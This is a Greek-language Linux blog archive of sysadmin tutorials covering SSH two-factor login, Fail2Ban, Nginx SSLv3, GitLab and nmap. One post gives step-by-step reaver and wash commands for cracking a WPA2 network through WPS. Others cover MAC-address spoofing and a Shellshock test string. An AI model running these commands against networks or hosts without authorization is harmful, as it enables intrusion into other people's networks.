Κυριακή, 21 Μαΐου 2017

Εγκατασταση Parrot Security απο LiveUSB. Ενημερωση του GRUB με chroot.


ΔΙΑΔΙΚΑΣΙΑ
Η εποχή των DVD έχει περάσει και πλέον οι περισσότερες εγκαταστάσεις γίνονται μέσω LiveUSB.
Εγκαθιστώντας το Parrot Security από το Live USB μπορεί στην επανεκκίνηση να σας βγάλει το εξής πρόβλημα:

Gave up waiting for root device. Common problems:
- Boot args (cat /proc/cmdline)
- Check rootdelay= (did the system wait long enough?)
- Check root= (did the system wait for right device?)
-Missing modules (cat /proc/modules; ls /dev)
ALERT! /dev/sdb does not exist. Dropping to shell!

BusyBox .............

(initramfs)_

Τι θέλει να μας πει ο ποιητής;
Η αναγνώριση του USB μέσου εγκατάστασης θα γίνεται στο /dev/sda ενώ ο δίσκος εγκατάστασης θα είναι ο /dev/sdb.

Πως μου κόβει εμένα και λέω θα κάνω chroot στο Parrot και θα παίξω λίγο με το GRUB. Ανοίγω κανονικά με το LiveUSB και δίνω το σετ των εντολών:

sudo mount /dev/sdb3 /mnt
sudo mount --bind /dev /mnt/dev
sudo mount --bind /proc /mnt/proc
sudo mount --bind /sys /mnt/sys
sudo chroot /mnt
update-initramfs -u
grub-install --recheck /dev/sdb
update-grub

Πατώ δυο φορές CONTRO+D (βγαίνει από το chroot και το τερματικό).
Κάνω επανεκκίνηση και βλέπω το GRUB του Parrot.

Επόμενη κίνηση, είναι να προσθέσετε τα mirrorlist.

sudo nano /etc/apt/sources.list.d/parrot.list

#stable repository
deb http://ftp.cc.uoc.gr/mirrors/linux/parrot/ parrot main contrib non-free
#deb-src http://ftp.cc.uoc.gr/mirrors/linux/parrot/ parrot main contrib non-free

Αποθήκευση και εκτελείστε τις εντολές:

sudo apt-get update && sudo apt-get upgrade
read more

Πέμπτη, 4 Μαΐου 2017

Ολοκλήρωση μετάφρασης ownCloud


Μέσα στον Απρίλιο οργανώθηκε στη Θεσσαλονίκη ένα μεταφραστικό hackathon. Αν και μεταφράσαμε αρκετά, δεν καταφέραμε να ολοκληρώσουμε την μετάφραση. Δεν ασχοληθήκαμε με τις εφαρμογές επί πληρωμή (Android, iOS, Windows Phone).

Έτσι σκεφτόμασταν μήπως οργανώναμε ένα ακόμα hackathon και έτσι μας δημιούργησαν ένα meetup account από το ownCloud.

Εγώ ο Αλέξανδρος και η Ελένη μένουμε κοντά και έτσι χρησιμοποιώντας το κανάλι στο telegram οργανώσαμε μικρούς μεταφραστικές συναντήσεις. Σε μια από αυτές μπήκε στην ομάδα η Ευαγγελία.

Έτσι το αποτέλεσμα αυτών των 2-3 μεταφραστικών συναντήσεων ήταν να τελειώσουμε τις μεταφράσεις. Να το αποτέλεσμα:


Αυτή είναι η 2η φορά που συμβαίνει αυτό. Περίπου τον Απρίλιο του 2014 ξανακάναμε αυτό το κατόρθωμα.

read more

Κυριακή, 2 Απριλίου 2017

Υπηρεσιες cloud. Τι να επιλεξετε; Μια μικρη βοηθεια...



Η ανάλυση της τεχνολογίας cloud είναι μεγάλη (προσωπική εκτίμηση, ο όρος δεν πρέπει να μεταφράζεται γιατί δεν σημαίνει κάτι το σύννεφο ή νέφος). Είναι μια νέα τεχνολογία που έχει μπει τελευταία στη ζωή μας για τις καθημερινές εργασίες αλλά και στην ζωή των τεχνικών, διαχειριστών συστημάτων. Χοντρικά μπορείτε να πείτε ότι cloud σημαίνει να έχετε πρόσβαση στα προσωπικά σας δεδομένα από οποιοδήποτε μέρος του κόσμου και από οποιαδήποτε συσκευή. Επόμενο μεγάλο ερώτημα είναι η ασφάλεια και η πρόσβαση των δεδομένων αυτών.

Οι πιο διαδεδομένες υπηρεσίες είναι το ηλεκτρονικό ταχυδρομείο (βλέπε gmail, outlook, yahoo κλπ) και τα πρόσβαση στα αρχεία σας (βλέπε google drive, MS one drive, Apple iCloud, Dropbox, facebook κλπ). Για μερικούς βολεύει πολύ και το κοινόχρηστο ημερολόγιο.

Ας αναλύσουμε όμως τα παραπάνω. Τόσο το mail όσο και η φιλοξενία των αρχείων σας γίνεται σε servers που συνήθως δεν γνωρίζετε που βρίσκονται, αλλά και ορισμένες φορές αποδέχεστε τους όρους χρήσης που σας προτείνουν χωρίς να τους διαβάσετε. Συνήθως μέσα στα μικρά γράμματα αναφέρει ότι η εταιρία θα έχει πρόσβαση στα δεδομένα σας. Αυτό συμβαίνει κυρίως για να προφυλαχτεί η εταιρία που θα σας παρέχει την υπηρεσία, ώστε να αποφύγει περιπτώσεις τρομοκρατίας ή κάποιας επιλήψιμης πράξης που θα απαιτήσει την πρόσβαση στον λογαριασμό του χρήστη για έλεγχο των δεδομένων του. Όμως οι εταιρίες πιθανό να δημιουργούν αλγόριθμους αναζήτησης ειδικών λέξεων στα δεδομένα σας ώστε να χτυπούν το καμπανάκι όταν βρουν κάποιες και ορισμένες φορές μπορεί να σας εμφανίζουν διαφημίσεις ανάλογα με τις συζητήσεις σας.

Έχω ακούσει από πολλούς να λένε, "εντάξει μωρέ, δεν έχω να κρύψω τίποτα". Νομίζετε ότι δεν έχετε να κρύψετε κάτι. Οι φωτογραφίες που πιθανό αποθηκεύετε ή ανεβάζετε στα μέσα κοινωνικής δικτύωσης είναι κάποια δεδομένα που θέλετε να βλέπετε εσείς ή κάποιος του συγγενικού σας περιβάλλοντος. Στην ουσία όμως μπορεί να έχει πρόσβαση και κάποια άλλη εταιρία που ίσως να πουλήσει τα δικαιώματα των φωτογραφιών σε τρίτους όταν και εάν γίνετε γνωστός. Γενικά πάντα έχετε να κρύψετε κάτι και ας μην το σκέφτεστε τώρα.

Η λύση στο παραπάνω πρόβλημα έρχεται να δώσουν το seafile, ownCloud ή Nextcloud (υπάρχουν και άλλες πλατφόρμες αλλά αυτές μας απασχολούν κυρίως εδώ). Τι κερδίζετε χρησιμοποιώντας τέτοια λύση; Καταρχήν στήνετε το πρόγραμμα αυτό είτε σε δικό σας χώρο στο σπίτι είτε νοικιάζετε χώρο από έναν host. Στην πρώτη περίπτωση έχετε περιορισμό ταχύτητας στην χώρα μας (υπάρχουν λύσεις με γρήγορη ταχύτητα upload αλλά για αρκετούς είναι απαγορευτικό το κόστος). Στην δεύτερη περίπτωση δεν ξέρετε που βρίσκονται τα δεδομένα μεν αλλά τουλάχιστον έχετε εμπιστοσύνη στο άτομο που σας νοίκιασε τον χώρο.


Μετά τα γεγονότα του καλοκαιριού του 2016, έχουμε δυο επιλογές (καλό για τους χρήστες). Το ownCloud (μετά την αποχώρηση των core developer) έχει επικεντρωθεί στο core που έχει να κάνει με την αποθήκευση-διαμοιρασμό των αρχείων μας. Υπάρχει η δυνατότητα των προσθέτων αλλά δεν προτείνεται λόγω σταθερότητας. Η κοινότητα έχει μικρύνει (μη σας πω ότι έχει εξαλειφθεί) και δεν γίνεται γρήγορη ανάπτυξη. Προσέχουν περισσότερο (ή καλύτερα ΜΟΝΟ) το core και γι'αυτό έχουν κρατήσει τους μεγάλους πελάτες.
Από την άλλη το Nextcloud που έχει τσιμπήσει τους core developers του ownCloud καθώς και την κοινότητα, αναπτύσσεται γρηγορότερα μεν τόσο στην βάση του όσο και στα πρόσθετα αλλά δεν γνωρίζουμε τι γίνεται από άποψη σταθερότητας. Έχει εισάγει πρόσθετα πχ για mail, επικοινωνία με φωνή (spreed) κλπ. Τα πρόσθετα αυτά αφενός ανοίγουν πόρτες και κενά ασφαλείας αφετέρου προσθέτουν αστάθεια (πχ μετά την αναβάθμιση του βασικού server από την μια έκδοση στην άλλη, δεν θα ξέρετε εάν θα δουλεύουν και τα πρόσθετα).
Το Seafile από την άλλη ίσως είναι η πιο ασφαλής πλατφόρμα αφού χρησιμοποιεί άλλη γλώσσα ανάπτυξης και διαφορετική προσέγγιση όσον αφορά τον server.


Για τους λάτρεις των διανομών linux, μπορείτε να παρομοιάσετε το ownCloud ως μια έκδοση LTS διανομής (την επιλέγετε εάν θέλετε να έχετε σταθερότητα χωρίς να βάζετε τα fancy προγράμματα, τις νέες εκδόσεις κλπ). Το Nextcloud παρομοιάστε το με μια έκδοση rolling διανομής. Μπορείτε να το έχετε το ίδιο σταθερό όσο την LTS αλλά χρειάζεται να έχετε το νου σας και να διορθώνετε μόνοι σας το κάθε σφάλμα που θα εμφανίζεται. Όχι ότι στην LTS δεν θα σας εμφανιστεί κάποιο σφάλμα αλλά προφανώς οι διορθώσεις θα είναι πιο γρήγορες.

Υπάρχουν πολλοί οδηγοί πως μπορείτε να μεταφερθείτε από την ownCloud εγκατάστασή σας στο Nextcloud. Πριν το κάνετε (αν το κάνετε) ξανασκεφτείτε το τι θα κερδίσετε αν το κάνετε. Επίσης προτού το κάνετε, κρατήστε ένα καλό backup τόσο των αρχείων σας όσο και όλης της εγκατάστασης διότι μπορεί να αποφασίσετε να ξαναγυρίσετε στο ownCloud.

read more

Δευτέρα, 20 Φεβρουαρίου 2017

ΠΩΣ ΘΑ ΧΑΚΑΡΩ ΔΙΚΤΥΑ 3






1.  Ανοίξτε το τερματικό σας (CTRL + ALT + T) και πληκτρολογείστε airmon-ng


# airmon-ng







2. Το επόμενο βήμα θα είναι να διακοπεί η σύνδεση wifi 


# airmon-ng stop wlan0
airmon-ng stop wlan
airmon-ng stop wlan0








3. Τώρα είμαστε έτοιμοι να δούμε την ασύρματη κίνηση γύρω μας. Εκτελώντας airodump-ng wlan0 θα αρχίσει η καταγραφή των δεδομένων



 # airodump-ng wlan0








4. Από το βήμα 3 παραπάνω, μπορούμε να βρούμε το σημείο πρόσβασης με αλγόριθμο κρυπτογράφησης WPA2, σημειώστε τον αριθμό του καναλιού. Τώρα θα μάθετε αν στόχος έχει ενεργοποιημένο ή όχι WPS.




 # wash -i wlan0 -c 8 -C -s
wash -i wlan0 -c 8 -C -s
wash -i wlan0 -c 8 -C -s








5.  Στο τελευταίο βήμα χρησιμοποιώντας Reaver για τον κωδικό πρόσβασης WPA2


#  reaver -i wlan0 -b E0:05:C5:5A:26:94 –fail-wait=360
reaver -i wlan0 -b E0:05:C5:5A:26:94 –fail-wait=360 - See more at: http://www.hacking-tutorial.com/hacking-tutorial/wifi-hacking-cracking-wpa2-password/#sthash.Hp9xVSk4.dpuf







read more

Πέμπτη, 9 Φεβρουαρίου 2017

διαδικασια εισοδου ssh με πιστοποιηση google και απενεργοποιηση εισoδου του root


Στον οδηγό αυτόν θα δούμε πως ενεργοποιούμε έναν εναλλακτικό τρόπο εισόδου στον ssh server μας μέσω του google authenticator μιας υπηρεσίας της google που μας προσφέρει τυχαίους κωδικούς ασφαλείας για χρήση εντός των υπηρεσιών της καθώς επίσης και για προσωπικές μας υπηρεσίες και φυσικά τον τρόπο αποτροπής εισόδου ως root στον ssh server μας και την δημιουργία  χρήστη για την επίτευξη της εισόδου μας.

Αρχικά δημιουργούμε νέο χρήστη στον server σε debian ή debian based διανομή:

# adduser mitsos

Ακολούθως εγκαθιστούμε το ακόλουθο module του ssh

# apt install libpam-google-authenticator -y
μετά δίνουμε την ακόλουθη εντολή ως χρήστης mitsos

$ google-authenticator

απαντάμε στις εξής ερωτήσεις:

 Do you want authentication tokens to be time-based (y/n) y


Do you want me to update your "~/.google_authenticator" file (y/n) y
 
Do you want to disallow multiple uses of the same authentication
token? This restricts you to one login about every 30s, but it increases
your chances to notice or even prevent man-in-the-middle attacks (y/n) y
 
By default, tokens are good for 30 seconds and in order to compensate for
possible time-skew between the client and the server, we allow an extra
token before and after the current time. If you experience problems with poor
time synchronization, you can increase the window from its default
size of 1:30min to about 4min. Do you want to do so (y/n) n
 
If the computer that you are logging into isn't hardened against brute-force
login attempts, you can enable rate-limiting for the authentication module.
By default, this limits attackers to no more than 3 login attempts every 30s.
Do you want to enable rate-limiting (y/n) y

μετα απο αυτό εγκαθιστούμε στο κινητό μας android την εξής εφαρμογή:

https://play.google.com/store/apps/details?id=com.google.android.apps.authenticator2

αφού εγκατασταθεί στο κινητό μας τότε την ανοίγουμε ακολουθούμε τις οδηγίες της και ακολούθως βρισκόμαστε στην αρχική οθόνη(εδω βλέπετε την δικιά μου)
 πατάμε το κουμπί +

Εδώ αν πατήσουμε Σάρωση γραμμ. κώδικα τότε θα ανοιξει την καμερα του κινητού μας για να σκανάρουμε τον qr code της οθόνης ή εναλλακτικά αν επιλέξουμε να εισάγουμε ένα παρεχόμενο κλειδί τότε δίνουμε το κλειδί που μας δίνει ακριβώς από κάτω από το qr code και μετά από αυτή την διαδικασία μας κάθε φορά που θα ανοίγουμε την εφαρμογή θα μας δίνει ένα εξαψήφιο  κωδικό τυχαίο ο οποίος θα ανανεώνεται συχνά.


Ακολούθως ανοίγουμε το εξής αρχείο για αλλαγές:

# nano vi /etc/pam.d/sshd

και το αρχείο θα πρέπει να μοιάζει κάπως έτσι:

auth required pam_google_authenticator.so
account required pam_nologin.so
@include common-account
session [success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.so close
session required pam_loginuid.so
session optional pam_keyinit.so force revoke
@include common-session
session optional pam_motd.so motd=/run/motd.dynamic
session optional pam_motd.so noupdate
session optional pam_mail.so standard noenv # [1]
session required pam_limits.so
session required pam_env.so # [1]
session required pam_env.so user_readenv=1 envfile=/etc/default/locale
session [success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.so open
@include common-password
Ακολούθως ανοίγουμε το αρχείο για αλλαγές:

# nano /etc/ssh/sshd.conf

και θα πρέπει να μοιάζει ως εξής:


# Port 22
Protocol 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
HostKey /etc/ssh/ssh_host_ecdsa_key
HostKey /etc/ssh/ssh_host_ed25519_key
UsePrivilegeSeparation yes
KeyRegenerationInterval 3600
ServerKeyBits 1024
SyslogFacility AUTH
LogLevel INFO
LoginGraceTime 30
PermitRootLogin no
StrictModes yes
RSAAuthentication yes
PubkeyAuthentication yes
IgnoreRhosts yes
RhostsRSAAuthentication no
HostbasedAuthentication no
IgnoreUserKnownHosts yes
PermitEmptyPasswords no
ChallengeResponseAuthentication yes
PasswordAuthentication no
X11Forwarding no
X11DisplayOffset 10
PrintMotd no
PrintLastLog no
TCPKeepAlive yes
# Banner /etc/ssh/issue
# find an Banner-example here
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server
UsePAM yes
AuthenticationMethods publickey,keyboard-interactive
PermitRootLogin no #(απενεργοποίηση ειδόδου του root)
PermitEmptyPasswords no
AllowUsers mitsos
αφού κάναμε τις αλλαγες επανεκκινούμε την υπηρεσία ssh:

# service ssh restart

δοκιμάζουμε να συνδεθούμε π.χ mitsos@192.168.1.52:

αντί για κωδικό μας ζητάει verification code, τότε εμείς δίνουμε τον εξαψηφιο κωδικό που μας δίνει ο google authenticator στο κινητό μας, εφόσον πήγαν όλα καλά θα σας επιτραπεί η είσοδος στον server σας.
read more

Τετάρτη, 1 Φεβρουαρίου 2017

KALI-LINUX/PARROT-LINUX: ΠΩΣ ΑΛΛΑΖΟΥΜΕ MAC ADDRESS







1. Ανοίξτε τερματικό και πληκτρολογήστε


root@kali#  ifconfig | grep HWaddr
ifconfig | grep HWaddr
ifconfig | grep HWaddr




θα δείτε την αρχική διεύθυνση MAC, 

2. Για προσωρινή αλλαγή MAC, θα πρέπει να απενεργοποιήσετε τo δικτύου με την εντολή 


root@kali# ifconfig eth0 down


3.  Μετά από αυτό μπορούμε να ρυθμίσουμε τη νέα διεύθυνση MAC


root@kali#  ifconfig eth0 hw ether 00:00:00:00:00:02
ifconfig eth0 down


 4. Τώρα μπορούμε να ενεργοποιήσετε το δίκτυο και πάλι



root@kali#  ifconfig eth0 up



 και μέχρι αυτό το σημείο έχουμε καταφέρει να αλλάξουμε την MAC μέχρι να κάνουμε επανεκκινήση, άν θέλετε βέβαια για μόνιμη αλλαγή της MAC ........

5. 

root@kali# nano /etc/network/interfaces


 και προσθέτουμε την παρακάτω γραμμή 


  pre-up ifconfig eth0 hw ether 00:00:00:00:00:02
/etc/network/interfaces.








ifconfig | grep HWaddr


read more

Δευτέρα, 30 Ιανουαρίου 2017

ΠΩΣ ΘΑ ΔΕΙΤΕ ΑΝ Ο SERVER ΣΑΣ ΕΧΕΙ ΚΕΝΑ ΑΣΦΑΛΕΙΑΣ ΚΑΙ ΠΩΣ ΘΑ ΤΑ ΔΙΟΡΘΩΣΕΤΕ






Η διαδικασία λέγεται Shellshock και έχει βαθμολογηθεί με άριστα 10 για την ακρίβεια. Εντοπίζει σφάλματα και κενά ασφαλείας σε UNIX/GNU-Linux 

 1. Για να ελέγξετε αν ο server σας είναι ευάλωτος, εκτελέστε την εντολή:


$ ή # env x='() { :;}; echo vulnerable' bash -c "echo this is a test"


Εάν τα αποτελέσματα μοιάζουν με αυτό, έχετε κενό ασφάλειας:


alex@debian:~# env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test



Ωστόσο, αν έχετε αυτά τα αποτελέσματα δεν έχετε τίποτα:

  alex@debian:~# env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test











read more

Πως να απενεργοποιησετε SSLv3 σε Nginx (προστασια απο POODLE vulnerability))






Το SSLV 3.0 είναι ένα ανασφαλή πρωτόκολλο και ευάλωτο σε POODLE attack με MITM τρόπο που σκοπό έχει την υποκλοπή των δεδομένων και στην εύκολη αποκρυπτογράφηση τους. Το SSLv3 έχει αντικατασταθεί από το TLS που υποστηρίζεται από όλα τα σύγχρονα προγράμματα περιήγησης γι 'αυτό θα πρέπει να είναι την ασφάλεια σας και να απενεργοποιήσετε SSLv3.


1.Με το αγαπημένο σας editor στο τερματικό 








 # nano /etc/nginx/sites-available/default



 Αντικαταστήστε αυτή τη γραμμή:








 ssl_protocols SSLv3 TLSv1;



 με αυτήν:




ssl_protocols TLSv1.2 TLSv1.1 TLSv1;



 2. Όταν έχετε κάνει όλες τις αλλαγές, κάντε επανεκκίνηση τον Nginx:




# /etc/init.d/nginx restart





read more

Πέμπτη, 26 Ιανουαρίου 2017

Ασφαλιστε τον server με το Fail2Ban και πως να ενημερωνεστε για τις επιθεσεις

Έχοντας στήσει nextcloud ή οποιαδήποτε άλλη παρόμοια υπηρεσία, προχωράμε στο θέμα ασφάλειας για τον χρήστη του server αυτού.



Βήμα 1o



Εγκατάσταση του fail2ban για το Nextcloud



Η υπηρεσία fail2ban έχει ως σκοπό την αποτροπή των εξωτερικών επιθέσεων ddos, φυσικά με την φραγη της ip του επιτιθέμενου.



Εγκαθιστούμε σε σύστημα Ubuntu Linux  ως εξής:



 $ sudo apt-get update && apt install fail2ban -y




 Δημιουργία αρχείου ρυθμίσεων του fail2ban για το nextcloud



$ sudo nano /etc/fail2ban/filter.d/nextcloud.conf


 και προσθέστε αυτές τις γραμμές:



[Definition]
failregex={"reqId":".*","remoteAddr":".*","app":"core","message":"Login failed: '.*' \(Remote IP: ''\)","level":2,"time":".*"}
ignoreregex =
Επεξεργάζεστε το αρχείο /etc/fail2ban/jail.conf


sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.conf.bak
sudo nano /etc/fail2ban/jail.conf
και προσθέστε το παρακάτω κείμενο
[nextcloud]
enabled = true
port = 80,443
protocol = tcp
filter = nextcloud
maxretry = 3
bantime = 180
logpath = /var/nc_data/nextcloud.log

 Δίνουμε τις παρακάτω εντολές για επανεκκίνηση της υπηρεσίας του fail2ban και τον της ορθής λειτουργείας αυτης
$ sudo service fail2ban restart
$ sudo fail2ban-client status nextcloud



Δοκιμάζουμε να συνδεθούμε με λανθασμένο συνθηματικό για να τσεκάρουμε αν λειτουργεί η υπηρεσία, αφού το κάνουμε αυτό δίνουμε ξανά την ακόλουθη εντολή στον server


$ sudo fail2ban-client status nextcloud




Βλέπουμε ότι στις αποκλεισμένες(banned list) ip οτι έχει την δικιά μας εξωτερική ip που μας δινει ο πάροχος.


Μπορούμε να ξεμπλοκάρουμε(unbanned) μια ip ως εξής


$ sudo fail2ban-client set nextcloud unbanip <Banned IP>


Βήμα 2ο 

Ενεργοποίηση υπηρεσίας ενημέρωσης με email(postfix)

Αρχικά εγκαθιστούμε το postfix με τις εξής εντολες

$ sudo apt-get -y --no-install-recommends install postfix mailutils libsasl2-2 libsasl2-modules
κατα την εγκατάσταση μας εμφανίζεται το εξης πλαισιο



με τον κέρσορα κατεβαίνουμε και επιλέγουμε την επιλογή Satellite system


και έπειτα μας ζητάει να δώσουμε το email για το σύστημα μας π.χ "pithome.org"

και ακολούθως μας ζητάει τον SMTP relay host δηλαδή τον server που θα προωθεί τα email στο παρόν οδηγό θα χρησιμοποιήσω το gmail οπότε δινουμε smtp.gmail.com

Ανοίγουμε το αρχειο ρυθμίσεων του postfix mail.cf ως εξής:

$ sudo nano /etc/postfix/main.cf

και στο τέλος του αρχειου προσθέτουμε τις εξής γραμμές:

smtp_use_tls = yes
smtp_sasl_auth_enable = yes
smtp_sasl_password_maps = hash:/etc/postfix/sasl/sasl_passwd
smtp_sasl_security_options = noanonymous
smtp_sasl_tls_security_options = noanonymous

σώζουμε το αρχείο και το κλείνουμε

Δημιουργούμε το αρχείο κωδικών για το gmail

$ sudo nano /etc/postfix/sasl/sasl_passwd

με το εξής περιεχόμενο που αφορά το όνομα χρήστη και κωδικό για το gmail καθώς επίσης τον smtp server:

smtp.gmail.com mymail:1234567

Δίνουμε την παρακάτω εντολή για την δημιουργία του πίνακα του postfix για το sasl_passwd αρχείο:

$ sudo postmap /etc/postfix/sasl/sasl_passwd

Δίνουμε τα απαραίτητα δικαιώματα σε φάκελο και αρχεία:

chown -R root:postfix /etc/postfix/sasl
chmod 750 /etc/postfix/sasl
chmod 640 /etc/postfix/sasl/sasl_passwd*

Ανοίγουμε ξανα το αρχείο /etc/postfix/main.cf
 
Με τα κοκκινα γράμματα είναι οι αλλαγές που κάνουμε στις default ρυθμίσεις.

myhostname = myserver
alias_maps = hash:/etc/aliases
alias_database = hash:/etc/aliases
myorigin = /etc/mailname
mydestination = root@myhome.org, $myhostname, myserver.lan, localhost.lan
relayhost = smtp.gmail.com
mynetworks = 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128
mailbox_size_limit = 0
recipient_delimiter = +
inet_interfaces = loopback-only
inet_protocols = all
smtp_use_tls = yes
smtp_sasl_auth_enable = yes
smtp_sasl_security_options = noanonymous
smtp_sasl_tls_security_options = noanonymous

όπως έχουμε το αρχείο ανοιχτό προσθέτουμε την εξής γραμμή:

sender_canonical_maps = hash:/etc/postfix/sender_canonical
κλείνουμε το αρχείο και το αποθηκεύουμε

Δημιουργούμε το εξής αρχειο:

$ sudo nano /etc/postfix/sender_canonical
και βάζουμε το εξής περιεχόμενο:

root mymail@gmail.com
www-data mymail@gmail.com
 Ο λόγος που το κάνουμε αυτο είναι για να δώσουμε προσβαση στον root και στον www-data χρήστη στο email μας.

Σώζουμε και κλείνουμε το αρχείο.

Στην συνέχεια ενημερώνουμε ξανά τον postfix:

$ sudo postmap /etc/postfix/sender_canonical
 

Κάνουμε επανεκκίνηση τον postfix:

$ sudo update-rc.d postfix defaults
$ sudo service postfix restart
Στην συνέχεια δοκιμάζουμε να στείλουμε δοκιμαστικά emails για να ελέγξουμε αν λειτουργεί ο postfix σωστά:

$ echo "This is a test." | mail -s "test message" mymail@gmail.com 
μετά από αυτήν την εντολή θα πρέπει να σας έρθει email με θέμα "This is a test." και περιεχόμενο "test message"

έλεγχουμε και το αρχείο καταγραφής για τυχόν σφάλματα.

$ cat /var/log/mail.log
 
Βήμα 3ο

Ρύθμιση του fail2ban για αποστολή ενημερωτικών emails μεσω postfix όταν θα αποκλείει τις ύποπτες διευθύνσεις ip.

Ανοίγουμε το jail.conf αρχείο:

$ sudo nano /etc/fail2ban/jail.conf
 Με κόκκινα γράμματα είναι οι αλλαγές που κάνουμε:
...
destemail = mymail@gmail.com
...
sender = root@myhome.org
...
mta = mail
...
# action = %(action_)s
action = %(action_mwl)s
...
Κάνουμε επανεκκίνηση την υπηρεσία fail2ban:

$ sudo service fail2ban restart
και είμαστε έτοιμοι!!

 

read more

ΠΩΣ ΘΑ ΕΓΚΑΤΑΣΤΗΣΕΤΕ ΤΟ GITLAB ΣΤΟ DEBIAN 8





Το Gitlab είναι μια web-based διαχείριση ενός λογισμικού για τους διακομιστές GIT παρόμοιο με το GitHub. ΤΟ Gitlab χρησιμοποιείται από πολλές μεγάλες εταιρείες τεχνολογίας, όπως η IBM, StackExchange, η NASA, Alibaba και η Red Hat. Το έργο Gitlab παρέχει πακέτα για όλες τις διανομές Linux Major συμπεριλαμβανομένων Debian, Ubuntu, CentOS, και το openSUSE. Το Gitlab είναι διαθέσιμο σε ελεύθερη Έκδοση της Κοινότητας (CE) και η Gitlab Enterprise Edition (EE).
 Gitlab CE σε ένα σύστημα Debian 8 λοιπόν με NGINX για την ασφάλεια του συστήματος.



1. # apt-get -y install curl openssh-server ca-certificates postfix

Το πρόγραμμα εγκατάστασης postfix θα σας ρωτήσει τα ακόλουθα ερωτήματα. Ο γενικός τύπος της διαμόρφωσης mail είναι "Internet Site"






2. 
Στο επόμενο βήμα θα πρέπει να εισάγετε το όνομα κεντρικού υπολογιστή του διακομιστή αλληλογραφίας. Στην περίπτωσή μου θα χρησιμοποιήσω "server1.example.com" εδώ για την εγκατάσταση αυτή. Για δική σας εγκατάσταση, χρησιμοποιήστε ένα όνομα διακομιστή που υπάρχει στο δικό σας domain name.





3. Το αποθετήριο Gitlab στο Debian 


# curl -sS https://packages.gitlab.com/install/repositories/gitlab/gitlab-ce/script.deb.sh | bash








Το όφελος από τη χρήση του αποθετήριου Gitlab είναι ότι οι ενημερώσεις μπορούν να εγκατασταθούν με το "apt-get update && apt-get upgrade" εύκολα στη συνέχεια, αντί να εγκαταστήσετε το αρχείο .deb χειροκίνητα





4. 
Και τώρα εγκαθηστούμε το GITLAB 


# apt-get update

# apt-get -y install gitlab-ce







5. Configure Gitlab


# gitlab-ctl reconfigure









6.
Χρησιμοποιήστε τo netstat για να βεβαιωθείτε ότι όλα τα στοιχεία του Gitlab τρέχουν


# netstat -ntap







Το αποτέλεσμα πρέπει να είναι παρόμοιο με το παραπάνω screenshot. Ο Nginx κάνει ακούει στη θύρα 80 και προωθεί τις εισερχόμενες αιτήσεις στον server gitlab HTTP στη θύρα 8080

7. Gitlab


όνομα ή τη διεύθυνση IP (http://server1.example.com)





Εισάγετε τον νέο κωδικό πρόσβασης δύο φορές και πατήστε το κουμπί "Αλλαγή κωδικού πρόσβασης"




 Σύνδεση με το όνομα χρήστη "root" και τον κωδικό πρόσβασης που έχετε ορίσει.











Θα δείτε το ταμπλό διαχειριστή Gitlab. Εδώ μπορείτε να δημιουργήσετε το πρώτο σας έργο.













read more

Πως να χρησιμοποιησετε το σαρωτη ασφαλειας NMAP στο GNU/Linux




1. Εγκατάσταση του NMAP

Debian  #apt-get install nmap

RHEL # yum install nmap

2.  Χρήση του NMAP
Μπορείτε να εκτελέσετε την εντολή "nmap" σε ένα τερματικό, που συνοδεύεται από IP ή ηλεκτρονική διεύθυνση του στόχου και τις διάφορες διαθέσιμες παραμέτρους. Για να πάρετε μια γενική εικόνα όλων των παραμέτρων που nmap μπορεί να χρησιμοποιηθεί με, χρησιμοποιήστε την εντολή "nmap -help"





θα δώσω μερικά παραδείγματα χρήσης μαζί με μια σύντομη επεξήγηση που θα επιτρέψει ελπίζω στον αναγνώστη να τροποποιήσει κάθε εντολή για τις ανάγκες του


# nmap -sS [IP address] or [website address]



Αυτή είναι μια βασική εντολή που μπορεί να χρησιμοποιηθεί για να ελέγξετε γρήγορα αν μια ιστοσελίδα είναι πάνω.





3. 

# nmap -O --osscan-guess [IP address] or [website address]



Με αυτή την εντολή το nmap προσπαθεί να μαντέψει τι λειτουργικό σύστημα τρέχει στο στόχο.





4. 

# nmap -vv [IP address] or [website address]




Εντολή σάρωσης ping, που είναι χρήσιμο όταν θέλουμε να δομε τις ανοιχτές πόρτες του στόχου.





5.


# nmap -sV [IP address] or [website address]


Αυτή η εντολή επιτρέπει στο χρήστη να ελέγχει τις υπηρεσίες που τρέχουν πάνω στο στόχο. Σημειώστε ότι η πληροφορία "Cloudflare-ngnix" προστέθηκε δίπλα στις υπηρεσίες των ανοικτών θυρών.




6. Μερικές εντολές nmap:
Για να δείτε αν είναι online ένας server με ping scanning:
# nmap -sP <link>
Το ίδιο αλλά στέλνοντας σκουπίδια (FIN,URG,PUSH):
# nmap -sX <link>
Για να δείτε τις ανοικτές πόρτες ενός server (χωρίς να τεστάρετε αν είναι online) με ping scan:
# nmap -Pn <link>
Το ίδιο αλλά με TCP connect scan (όχι και τόσο stealth...):
# nmap -sT <link>
Για να σκανάρετε τις ανοικτές πόρτες ενός μηχανήματος και το OS του με stealth TCP SYN/ACK:
# nmap -sS -O <link>
Για να σαρώσετε τις ανοικτές πόρτες ενός server με OS και service detection, αλλά και traceroute scanning :
# nmap -A <link>
To ίδιο αλλά πιο γρήγορα:
# nmap -A -Τ4 <link>
Για να σκανάρετε τις ανοικτές πόρτες με stealth TCP SYN/ACK αλλά και UDP scan καθώς και να βρείτε ποιες εκδόσεις τρέχει:
nmap -sSU -A <link>
Σε όλα τα παραπάνω, αν προσθέσετε την παράμετρο -v, το nmap θα σας λέει περισσότερα για το τι κάνει. Αυτό ειναι καλό για να μην περιμένετε για ώρα χωρίς να βλέπετε τιποτε στην οθόνη...

ZENMAP
Γραφική διεπαφή χρήστη

Με ολα τα παραπάνω μπορείτε να ψάξετε βαθύτερα δοκιμάζοντας διάφορες επιλογές και να δείτε τι μπορείτε να μάθετε για έναν στόχο, αλλά για εκείνους που θέλουν ένα περισσότερο φιλικό προς το χρήστη θα πρέπει να εγκαταστήσετε το "zenmap" πακέτο που είναι ένα εργαλείο GUI για Nmap.










